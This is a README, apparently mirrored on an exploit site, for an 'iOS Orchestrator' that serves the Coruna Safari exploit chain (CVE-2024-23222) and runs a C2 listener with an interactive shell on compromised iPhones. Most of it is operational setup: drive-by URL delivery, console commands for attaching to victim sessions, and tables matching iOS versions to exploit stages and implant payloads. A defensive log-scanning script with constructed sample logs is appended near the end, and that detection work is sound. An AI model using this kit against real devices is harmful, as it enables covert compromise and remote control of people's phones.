## https://sploitus.com/exploit?id=472EEC26-F9C7-50CA-A4D6-2E1879CAC2F3
# iOS Orchestrator: Coruna
Web server, C2 listener, and interactive shell for the **Coruna** exploit chain (CVE-2024-23222). Targets Safari on iOS 13–17.2.1. Drive-by only: the victim opens a single URL in Safari; no reverse shell or custom app is required for the browser stage.
## Requirements
- **Python 3.8+**
- Dependencies: `pip install -r requirements.txt`
## Quick start
1. **Config**: Copy `config.json.example` to `config.json` (optional; the defaults work for localhost).
2. **Run**: From the `ios_orchestrator` directory: `python main.py`
3. **Target**: On a vulnerable iPhone, open `http://YOUR_IP/coruna/group.html` in Safari (HTTP only; ensure port 80 is reachable).
4. **Shell**: When a session appears, use the console:
```
(coruna)> list
[abc12345] 192.168.1.10 2024-03-13 14:30:00
(coruna)> use abc12345
(shell)> id
(shell)> exit
```
## Console commands
| Command | Description |
|-------------|----------------------------|
| `list` | List active C2 sessions |
| `use <id>` | Attach to the shell of session `<id>` |
| `help` | Show help |
| `quit` | Shut down server and exit |
## Configuration
Edit `config.json` (create from `config.json.example` if needed):
| Key | Description | Default |
|------------------------|--------------------------------------|----------------|
| `c2_bind` | C2 listener bind address | `0.0.0.0` |
| `c2_port` | C2 listener port | `8080` |
| `web_server_ip` | Web server bind address | `0.0.0.0` |
| `web_server_port` | Web server port | `80` |
| `exploit_templates_dir`| Path to exploit files (e.g. coruna) | `exploits/` |
| `static_files_dir` | Path for static assets | `web_server/static/` |
## Project layout
```
ios_orchestrator/
├── main.py                     # Entry point: web server, C2, console loop
├── config.json.example         # Example config (copy to config.json)
├── requirements.txt
├── core/
│   └── config_manager.py       # Config load/save and defaults
├── web_server/
│   ├── exploit_http_server.py  # Serves /coruna/ (group.html, Stage1/2/3, payloads)
│   └── static/                 # Optional static assets
├── c2_comms/
│   ├── c2_server.py            # C2 TCP listener; attaches sessions
│   └── session.py              # Session state and shell I/O
├── exploits/
│   └── coruna/                 # Coruna exploit chain
│       ├── group.html          # Loader: fingerprint, Stage1/2/3 selection
│       ├── platform_module.js
│       ├── utility_module.js
│       ├── Stage1_*.js         # Browser primitives (cassowary, terrorbird, bluebird, jacurutu)
│       ├── Stage2_*.js         # PAC bypass (seedbell variants)
│       ├── Stage3_VariantA.js / Stage3_VariantB.js
│       └── payloads/           # manifest.json, bootstrap.dylib, per-hash dylibs/bins
└── docs/
    ├── CVE-2024-23222_ANALYSIS.md
    ├── REVIEW.md
    ├── REPOS_ANALYSIS.md
    └── THREE_REPOS_FILE_INVENTORY.md
```
## C2 and payloads
- Implants in `exploits/coruna/payloads/` may have a **hardcoded C2** in the binaries. If no session appears after a successful drive-by:
  - Ensure port **8080** is open (or the port you set in `config.json`).
  - The original kit may have used a different C2; the payloads are from the [khanhduytran0/coruna](https://github.com/khanhduytran0/coruna) payload set.
- This project does **not** implement a reverse shell for the initial compromise; the drive-by delivers the chain and the C2 receives connections from the implant.
## Exploit chain (Coruna)
- **Stage 1**: WebKit/JSC exploit (version-dependent): gains arbitrary read/write via WASM-backed primitives.
- **Stage 2**: PAC bypass (Intl.Segmenter / BreakIterator) where applicable.
- **Stage 3**: Sandbox escape and payload delivery: loads `bootstrap.dylib`, feeds payloads from `payloads/manifest.json` and the per-hash directories.
### Vulnerable iOS versions and chains
Version selection is driven by `platform_module.js` (from the device user agent). Each range uses a specific Stage1 → Stage2 → Stage3 path.
#### Stage 1 (browser primitive)
| iOS version | Flag | Module | In repo |
|-------------|------|--------|---------|
| **16.6 – 17.2.1** | JtEUci | cassowary | ✓ |
| **16.2 – 16.5.1** | KeCRDQ | terrorbird | ✓ |
| **15.6 – 16.1.2** | ShQCsB | bluebird | ✓ |
| **15.2 – 15.5** | RbKS6p | jacurutu | ✓ |
| **11.0 – 15.1** | mmrZ0r | 7d8f5bae… | ✗ (404) |
#### Stage 2 (PAC bypass)
| iOS version | Flag | Module(s) | In repo |
|-------------|------|-----------|---------|
| **17.0 – 17.2.1** | wF8NpI | seedbell_pre → seedbell (17.x) | ✓ |
| **16.6 – 16.7.12** | LJ1EuL | seedbell_pre → seedbell (16.6–16.7) | ✓ |
| **16.3 – 16.5.1** | CpDW_T | seedbell (16.3–16.5.1) | ✓ |
| **15.0 – 16.2** | IqxL92 | breezy15 | ✓ |
| **13.0 – 14.x** | (default) | breezy | ✓ |
#### Stage 3 (sandbox escape)
| Condition | Module |
|-------------------------|-----------|
| wC3yaB set and PAC OK | VariantA |
| Otherwise | VariantB |
**Example full chains:**
- **iOS 17.0:** cassowary → seedbell_pre + seedbell (17.x) → VariantA or VariantB
- **iOS 16.5:** terrorbird → seedbell (16.3–16.5.1) → VariantB
- **iOS 16.7:** cassowary → seedbell_pre + seedbell (16.6–16.7) → VariantB
- **iOS 15.4:** jacurutu → breezy15 → VariantB
- **iOS 14.x:** would use mmrZ0r (Stage1) → breezy (Stage2) → VariantB, but **mmrZ0r is missing** (404).
The **mmrZ0r** Stage1 (`7d8f5bae97f37aa318bccd652bf0c1dc38fd8396.js`) for **iOS 11–15.1** is not present in public repos; devices in that range get a 404 for that module. See `docs/REPOS_ANALYSIS.md` and `docs/THREE_REPOS_FILE_INVENTORY.md` for details.
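For defenders, the request pattern above (a fingerprinting loader followed by per-version Stage files under `/coruna/`) and the 13–17.2.1 target range are both detectable from ordinary web or proxy logs. The following is an added example written for this page, not code from the orchestrator project: it scans Common Log Format lines for the chain's file paths and reads the iOS version out of the Safari user agent to flag which clients fall inside the vulnerable range. The log lines and user agents are constructed samples; the module file name `Stage1_terrorbird.js` is assumed from the `Stage1_*.js` naming in the layout.

```python
import re

# File paths the orchestrator serves under /coruna/ (from the project layout above).
CORUNA_RE = re.compile(
    r"/coruna/(?:group\.html|platform_module\.js|utility_module\.js"
    r"|Stage[123]_[A-Za-z0-9_]+\.js|payloads/(?:manifest\.json|bootstrap\.dylib))"
)
# Safari on iOS/iPadOS reports e.g. "CPU iPhone OS 16_5 like Mac OS X" / "CPU OS 16_5 ...".
IOS_UA_RE = re.compile(r"CPU (?:iPhone )?OS (\d+)_(\d+)(?:_(\d+))?")
VULN_MIN, VULN_MAX = (13, 0, 0), (17, 2, 1)  # range this README says the chain targets
# Common Log Format with referer and quoted user agent.
CLF_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"'
)

def ios_version(ua):
    """Return (major, minor, patch) from an iOS Safari UA, or None for non-iOS clients."""
    m = IOS_UA_RE.search(ua)
    return tuple(int(g) if g else 0 for g in m.groups()) if m else None

def in_vulnerable_range(ver):
    return ver is not None and VULN_MIN <= ver <= VULN_MAX

def scan_log(lines):
    """Yield (client_ip, path, status, ios_version, exposed) for each Coruna-related request."""
    hits = []
    for line in lines:
        m = CLF_RE.match(line)
        if not m:
            continue
        ip, path, status, ua = m.groups()
        if CORUNA_RE.search(path):
            ver = ios_version(ua)
            hits.append((ip, path, int(status), ver, in_vulnerable_range(ver)))
    return hits

# Constructed sample data: two iPhones (one in range, one patched) and a Mac desktop.
UA_16_5 = ("Mozilla/5.0 (iPhone; CPU iPhone OS 16_5 like Mac OS X) AppleWebKit/605.1.15 "
           "(KHTML, like Gecko) Version/16.5 Mobile/15E148 Safari/604.1")
UA_17_4 = UA_16_5.replace("16_5", "17_4").replace("16.5", "17.4")
UA_MAC = ("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 "
          "(KHTML, like Gecko) Version/17.2 Safari/605.1.15")
SAMPLE_LOG = [
    f'192.168.1.10 - - [13/Mar/2024:14:29:55 +0000] "GET /coruna/group.html HTTP/1.1" 200 4096 "-" "{UA_16_5}"',
    f'192.168.1.10 - - [13/Mar/2024:14:29:56 +0000] "GET /coruna/Stage1_terrorbird.js HTTP/1.1" 200 65536 "-" "{UA_16_5}"',
    f'192.168.1.22 - - [13/Mar/2024:14:30:01 +0000] "GET /coruna/group.html HTTP/1.1" 200 4096 "-" "{UA_17_4}"',
    f'192.168.1.30 - - [13/Mar/2024:14:30:05 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "{UA_MAC}"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

A 404 on a `Stage1_*.js` request from an in-range device is still worth alerting on: it means the loader ran and selected a module that this deployment does not ship (the mmrZ0r case described above).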
## Credits and references
- Exploit chain and payloads: [khanhduytran0/coruna](https://github.com/khanhduytran0/coruna) (local-hostable, deobfuscated; additional Stage modules from `other/`).
- Analysis and docs: see `docs/` and the repositories listed in `REPOS_ANALYSIS.md`.
## Disclaimer
This project is for **authorized security research and education** only. The vulnerabilities targeted have been patched by Apple. Do not use against systems or users without explicit permission.